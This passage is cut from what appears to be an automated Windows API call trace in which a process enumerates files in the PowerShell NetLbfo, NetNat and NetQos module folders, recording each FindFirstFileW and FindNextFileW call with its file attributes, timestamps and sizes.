ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.format.ps1xml", cAlternateFileName="")) returned 1 [0177.385] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.psd1", cAlternateFileName="")) returned 1 [0177.385] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.385] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 0 [0177.385] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.386] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1")) returned 0x20 [0177.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.389] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0177.389] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a [0177.389] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.392] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.392] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1725, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.cdxml", cAlternateFileName="")) returned 1 [0177.392] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ca9, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.392] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.393] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatExternalAddress.cdxml", cAlternateFileName="")) returned 1 [0177.393] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatGlobal.cdxml", cAlternateFileName="")) returned 1 [0177.393] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatSession.cdxml", cAlternateFileName="")) returned 1 [0177.393] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x118d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatStaticMapping.cdxml", cAlternateFileName="")) returned 1 [0177.393] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 1 [0177.394] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 0 [0177.394] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.395] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0177.395] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a [0177.395] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.396] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.396] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1725, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.cdxml", cAlternateFileName="")) returned 1 [0177.396] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ca9, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.396] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.396] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatExternalAddress.cdxml", cAlternateFileName="")) returned 1 [0177.397] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatGlobal.cdxml", cAlternateFileName="")) returned 1 [0177.397] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatSession.cdxml", cAlternateFileName="")) returned 1 [0177.397] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x118d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatStaticMapping.cdxml", cAlternateFileName="")) returned 1 [0177.397] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 1 [0177.398] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.398] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.399] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5928b0 [0177.435] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.435] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1725, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.cdxml", cAlternateFileName="")) returned 1 [0177.435] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ca9, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.436] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.436] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatExternalAddress.cdxml", cAlternateFileName="")) returned 1 [0177.436] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatGlobal.cdxml", cAlternateFileName="")) returned 1 [0177.437] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatSession.cdxml", cAlternateFileName="")) returned 1 [0177.437] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x118d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatStaticMapping.cdxml", cAlternateFileName="")) returned 1 [0177.437] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 1 [0177.437] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 0 [0177.438] FindClose (in: hFindFile=0x1a5928b0 | out: hFindFile=0x1a5928b0) returned 1 [0177.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.442] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.443] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.443] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xed31, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.cdxml", cAlternateFileName="")) returned 1 [0177.443] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.443] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bce, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.444] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, 